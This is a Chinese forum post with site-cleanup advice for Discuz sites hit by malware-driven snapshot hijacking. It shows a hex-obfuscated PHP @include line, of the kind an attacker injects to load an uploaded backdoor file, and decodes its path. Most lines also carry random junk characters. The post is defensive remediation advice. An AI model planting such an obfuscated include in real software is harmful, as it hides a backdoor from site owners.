关于被挂马,劫持快照问题:) z/ ?) z( L; G, k
8 ^. K7 M1 O+ g# x0 g( h. c0 Z7 B
用以下方法试试1 A! G h( o( v
( x' ?8 j3 @9 k( i. [+ V1 ^4 v) Y
若存在,处理前,先卸载所有盗版插件与模版。& W* e0 W+ i3 U+ J
( n/ c2 T$ k! }/ @" |+ U
进discuz后台找到工具-文件校验,看下最近有哪些php文件被修改了。( V, w: ?% D- I( m5 l9 a. W) V. B
; d9 l& G& P+ A2 ~; _9 M* P
1、排查网站源文件的php 文件,查看是否有出现IP地址、或者异常网站(上面跳转的网站),如果有删除就可以了。
- {" p# D/ B5 w ~0 e- D
* c+ b. @# R0 m, r- @2、排查网站源文件的php 文件,查看是否有如下代码:@include($_SERVER['DOCUMENT_ROOT']0 O7 r) M" ^7 ?2 u9 p6 {3 ^
/ [1 t# k6 x3 q% U) d(排查一般用WEBshell后门扫描软件扫描核查!)8 }8 p$ o s0 x3 J
7 W" q/ y9 q1 s. ]- L- i
如果有就删除此段代码。并把该段代码进行解密。) q% h; H+ I( L5 `8 |; K9 r- |
/ R1 l" p0 Q' a/ b% D5 L# E$ Z
举例:@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30'));
- D- Y2 z: `0 n7 _+ L- @7 y
; j2 }1 }. \6 [, V" T需要解密的代码为:2F646174612F6176617461722F305 q# t) J6 @2 h0 M* @! ~$ z
- m1 a5 g. c4 P
解密后为:/data/avatar/0
0 L5 L# ?# N5 y. z$ [- f
$ z( }% q F6 N) {$ Q: t% G3 J# u代码解密地址:http://www.bejson.com/convert/ox2str/) }: ~, j/ K; ^/ O1 u) u
! n3 F( ]5 I8 L0 `3 M+ x3 T6 @
6 F5 }# U8 C, o) |) v意思就是在上述路径下存在被非法上传的文件,用于做快照劫持。9 q! N8 E) `! p" U" s# ^& Q
W9 o. g, |3 X) Y9 G' n {# ~解决办法:删除上面的代码和文件即可。
+ d0 d% C* w) j6 R$ `7 \) g! @
: d/ v) I& [2 o0 a# c) o挂马问题解决了后,记得更改服务器相关的各种密码,尽量设置的复杂一点。 |
